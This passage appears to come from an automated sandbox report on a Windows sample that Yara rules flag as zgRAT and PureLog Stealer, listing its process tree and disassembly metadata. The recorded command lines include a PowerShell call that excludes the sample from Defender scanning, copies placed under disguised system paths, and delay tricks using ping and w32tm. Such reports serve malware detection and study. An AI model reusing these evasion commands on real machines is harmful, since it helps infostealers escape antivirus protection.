                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:30
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:31
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:32
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:33
                                                                          Start time:13:21:58
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:34
                                                                          Start time:13:21:59
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat"
                                                                          Imagebase:0x7ff758870000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:35
                                                                          Start time:13:21:59
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:36
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Program Files\Windows Multimedia Platform\dllhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                                          Imagebase:0x1c0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 74%, ReversingLabs
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:37
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Program Files\Windows Multimedia Platform\dllhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                                          Imagebase:0x290000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:38
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Imagebase:0x8e0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:39
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Imagebase:0xa80000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:40
                                                                          Start time:13:22:00
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\chcp.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x7ff79d8c0000
                                                                          File size:14'848 bytes
                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:41
                                                                          Start time:13:22:01
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Imagebase:0x7a0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 74%, ReversingLabs
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:42
                                                                          Start time:13:22:01
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Imagebase:0x7d0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:43
                                                                          Start time:13:22:01
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\PING.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:ping -n 10 localhost
                                                                          Imagebase:0x7ff700f00000
                                                                          File size:22'528 bytes
                                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:44
                                                                          Start time:13:22:07
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                          Imagebase:0x7ff693ab0000
                                                                          File size:496'640 bytes
                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:45
                                                                          Start time:13:22:09
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                                          Imagebase:0xc40000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:47
                                                                          Start time:13:22:12
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                                          Imagebase:0xdd0000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:48
                                                                          Start time:13:22:12
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" "
                                                                          Imagebase:0x7ff758870000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:49
                                                                          Start time:13:22:12
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:50
                                                                          Start time:13:22:12
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\chcp.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x7ff79d8c0000
                                                                          File size:14'848 bytes
                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:51
                                                                          Start time:13:22:13
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\w32tm.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                          Imagebase:0x7ff7c0e20000
                                                                          File size:108'032 bytes
                                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:52
                                                                          Start time:13:22:16
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat"
                                                                          Imagebase:0x7ff758870000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:53
                                                                          Start time:13:22:16
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:54
                                                                          Start time:13:22:16
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\chcp.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x7ff79d8c0000
                                                                          File size:14'848 bytes
                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:55
                                                                          Start time:13:22:16
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\w32tm.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                          Imagebase:0x7ff7c0e20000
                                                                          File size:108'032 bytes
                                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:56
                                                                          Start time:13:22:18
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                                          Imagebase:0x640000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:59
                                                                          Start time:13:22:21
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                                          Imagebase:0x140000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:60
                                                                          Start time:13:22:22
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat" "
                                                                          Imagebase:0x7ff758870000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:61
                                                                          Start time:13:22:22
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:10%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:4
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 6511 7ffd9bc7c681 6514 7ffd9bc7c69f 6511->6514 6512 7ffd9bc7c7e6 QueryFullProcessImageNameA 6513 7ffd9bc7c844 6512->6513 6514->6512 6514->6514

                                                                            Executed Functions

                                                                            Function 00007FFD9B880D4C Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5[_H
                                                                            • API String ID: 0-3279724263
                                                                            • Opcode ID: f0bf71e4b34b52e5b0d7f3c3f7eb265be18d7b91e3c724f00290bac32dc733cd
                                                                            • Instruction ID: 7c795bef1dbe50254617d69a086197b99864fd122e9541c3ed62703454e0c122
                                                                            • Opcode Fuzzy Hash: f0bf71e4b34b52e5b0d7f3c3f7eb265be18d7b91e3c724f00290bac32dc733cd
                                                                            • Instruction Fuzzy Hash: 44910171A19ECD4FE799DB6888697A97FE1FF9A314F4100BAD059C72E2CB782801C701
                                                                            Function 00007FFD9BC7C681 Relevance: 1.8, APIs: 1, Instructions: 253COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1824088603.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID: FullImageNameProcessQuery
                                                                            • String ID:
                                                                            • API String ID: 3578328331-0
                                                                            • Opcode ID: 577562e386507305632d5df50020d07c074273ca33f9f4737fee5f31fae6fc7e
                                                                            • Instruction ID: 8c6807bfd719e7f999328ff4d36dce132107e1f5beea389b9e7209b61ae060b4
                                                                            • Opcode Fuzzy Hash: 577562e386507305632d5df50020d07c074273ca33f9f4737fee5f31fae6fc7e
                                                                            • Instruction Fuzzy Hash: D371A030619A8D8FDB69DF28C8957F937E1FB58311F00427EE84EC7292CB74A9458B81
                                                                            Function 00007FFD9B8808E8 Relevance: .1, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d7c8af078bb74ded600dbc7b857b07d3eac4925ae80691c7ce74143467092594
                                                                            • Instruction ID: 7f9a8ba83667a25edb97b7fbd74e96426a801bd769dd8f826f4b39f60237caf2
                                                                            • Opcode Fuzzy Hash: d7c8af078bb74ded600dbc7b857b07d3eac4925ae80691c7ce74143467092594
                                                                            • Instruction Fuzzy Hash: 5131063130D9194FD768EB5CE88A9B977D1EF8932130501BBE48AC7166ED21AC828781
                                                                            Function 00007FFD9B88095A Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 992e5cc763077809604e407682bfc9b19e451da91de7db723ffaf0fc46962fe3
                                                                            • Instruction ID: 36dc43b4766978d7b3295fa5aee1a58db45c7962044b5433ae66b08056ddecab
                                                                            • Opcode Fuzzy Hash: 992e5cc763077809604e407682bfc9b19e451da91de7db723ffaf0fc46962fe3
                                                                            • Instruction Fuzzy Hash: 32310811B0DD6A1FE75CB76874AAAF877C1DF48325B1444BBE40EC32E7DD28AC428281
                                                                            Function 00007FFD9B880960 Relevance: .1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 306d11ede673656945a01bdf868c1f460d92257974cbbd1cc24c5588a5b8b757
                                                                            • Instruction ID: 89c2256f6d02a96a78238efefd725654974c425e0961980f410effeca9f4fc60
                                                                            • Opcode Fuzzy Hash: 306d11ede673656945a01bdf868c1f460d92257974cbbd1cc24c5588a5b8b757
                                                                            • Instruction Fuzzy Hash: 7D31E911B1DD6E1FE75CB768786AAB463C1DF48329B1444BBE41EC32E7DD28AC424285
                                                                            Function 00007FFD9B881171 Relevance: .1, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4d581eca2efc13d246781b7d341b488af71af8330d3f7d66e9cc05529c0755e8
                                                                            • Instruction ID: efccc94ad168a44e56f5de5cb1448ad62cfc65e19c378858b71b7c71e36d1d35
                                                                            • Opcode Fuzzy Hash: 4d581eca2efc13d246781b7d341b488af71af8330d3f7d66e9cc05529c0755e8
                                                                            • Instruction Fuzzy Hash: E731A830A0D6998FDB46EB74C8659B97BF1FF5A310B0505FAC059D71A2DA38A841C750
                                                                            Function 00007FFD9B88360E Relevance: .1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e1bcacab11ec40347e87656e60738a2bf5205393cd186c8a8ad4f6edb62bf5f
                                                                            • Instruction ID: 08408f4283c42aefee83cfaf7f1b502bebc8301d5f102f03e6ac47d77b34a660
                                                                            • Opcode Fuzzy Hash: 2e1bcacab11ec40347e87656e60738a2bf5205393cd186c8a8ad4f6edb62bf5f
                                                                            • Instruction Fuzzy Hash: 1E215321F1ED0D8BEBA8E76CD46567822D2EF9C710F570175E05ED32B2DD38AE414601
                                                                            Function 00007FFD9B880998 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f432d429f7e2b9dd985f9ff0030f0f5ea5e213ca792d12271c0aa659b74133aa
                                                                            • Instruction ID: 09d0627a656c4db1c3ece6389ea604c480db7cc2d067e40cd7a99471ca6cbf34
                                                                            • Opcode Fuzzy Hash: f432d429f7e2b9dd985f9ff0030f0f5ea5e213ca792d12271c0aa659b74133aa
                                                                            • Instruction Fuzzy Hash: 1B212520B19D9D0FF798E76C54AAA7976C2EB8C315B5100B9E40DC32E7DD28AC428241
                                                                            Function 00007FFD9B880C25 Relevance: .1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0f438a3b134b2c3e621717aff0e23e61f333d66285c62d2193fee62448cc999
                                                                            • Instruction ID: bce52f1a07565266355f8a103ec76b13b9b9b92a79f0063ac81d3926728d6cd4
                                                                            • Opcode Fuzzy Hash: b0f438a3b134b2c3e621717aff0e23e61f333d66285c62d2193fee62448cc999
                                                                            • Instruction Fuzzy Hash: D4214C36F1DA5D8FE726ABA89C250DC7B60EF85724F0541F3C068CB1D3D93866469390
                                                                            Function 00007FFD9B880C38 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0cab9473edb6007aa99ea9e6e587afa9ca456fd54f0c71c152f78a9d2eb81809
                                                                            • Instruction ID: dff0be1ec1985ade48eef055351781166838b875604cddd851b1dac1c105ac87
                                                                            • Opcode Fuzzy Hash: 0cab9473edb6007aa99ea9e6e587afa9ca456fd54f0c71c152f78a9d2eb81809
                                                                            • Instruction Fuzzy Hash: D811E735B1EA8D8FE722DFA8886119C7BB1EF45710F0645F7C094DB1A2D53866458780
                                                                            Function 00007FFD9B880C40 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f55ccc75b0ddbacaf6541b72e714224925d8eefd141fdd6bfad0d315c39ea941
                                                                            • Instruction ID: 746515e8b20481b43a312154eea7961bce95d500439dd2e424ea8d5c05f8eff7
                                                                            • Opcode Fuzzy Hash: f55ccc75b0ddbacaf6541b72e714224925d8eefd141fdd6bfad0d315c39ea941
                                                                            • Instruction Fuzzy Hash: 8011E531F1EA8D8FE722DFA4886009D7FB1EF46710F0641F7C094DB2A2D9386A458780
                                                                            Function 00007FFD9B880C48 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 421debad41467fb6ccc61581254d0dd1d70276ffa3fc9816191ea8b129ea36b5
                                                                            • Instruction ID: 6519aef3443bc1cd8b35089857717ddef662785ed6f77057937f2e419bb79be0
                                                                            • Opcode Fuzzy Hash: 421debad41467fb6ccc61581254d0dd1d70276ffa3fc9816191ea8b129ea36b5
                                                                            • Instruction Fuzzy Hash: 31018031E1EA8D9FE726DFA4886049D7FB1EF46710F1641F7C0A4DB2A2D9386A458780
                                                                            Function 00007FFD9B886C1A Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1819739687.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
